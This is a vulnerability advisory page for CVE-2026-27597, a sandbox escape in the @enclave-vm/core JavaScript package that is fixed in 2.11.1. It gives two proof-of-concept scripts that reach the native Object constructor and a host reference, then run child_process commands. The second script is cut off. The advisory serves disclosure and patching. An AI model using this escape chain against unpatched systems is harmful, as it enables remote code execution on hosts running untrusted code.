CVE-2026-27597
Summary
It is possible to escape the security boundraries set by @enclave-vm/core, which can be used to achieve remote code execution (RCE).
The issue has been fixed in version 2.11.1.
Details
It is possible to obtain the native Object constructor (instead of the SafeObject wrapper). This can be used to get retrieve property descriptors via Object.getOwnPropertyDescriptors, allowing access to properties otherwise restricted by the sandbox.
When a memory limit is set (which is the default), __host_memory_track, a host object, can be used to escape via the host function constructor.
When this is not the case, a host reference can be obtained via Node's nodejs.util.inspect.custom symbol (which can be triggered, for example, through console.log).
Proof of Concept
PoC 1
const { Enclave } = require("@enclave-vm/core");
const enclave = new Enclave({
securityLevel: "SECURE",
toolHandler: () => {},
});
const result = enclave.run(`
const op = {}[["proto"]];
const ho = op[["constructor"]];
const glob = ho.getOwnPropertyDescriptors(this);
return {
res: glob.host_memory_track__.value[["constructor"]]("return process")()
.getBuiltinModule("child_process")
.execSync("id")
.toString()
.split("\\n"),
};`);
result
.then((v) => console.log("success", v))
.catch((e) => console.log("failure", e));
PoC 2
const { Enclave } = require("@enclave-vm/core");
const enclave = new Enclave({
securityLevel: "STRICT",
toolHandler: () => {},
memoryLimit: 0,
});
const result = enclave.run(`
const op = {}[['proto']];
const ho = op[['constructor']];
const glob = ho.getOwnPropertyDescriptors(this);
const sym = glob[['Symbol']].value.for('nodejs.util.inspect.custom');
let result;
const obj = {
[sym]: (depth, option, inspect) => {
result = inspect[['constructor']]
[['constructor']]('return process')()
.getBuiltinModule('child_process')
.execSync('id')
⚡ Watch CVE-2026-27597
Get an email if CVE-2026-27597 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.88% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 55% of all EPSS-scored CVEs.
Advisory coverage (1)
- criticalGHSA-f229-3862-4942: @enclave-vm/core is vulnerable to Sandbox Escapeghsa · 2026-02-25
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-27597)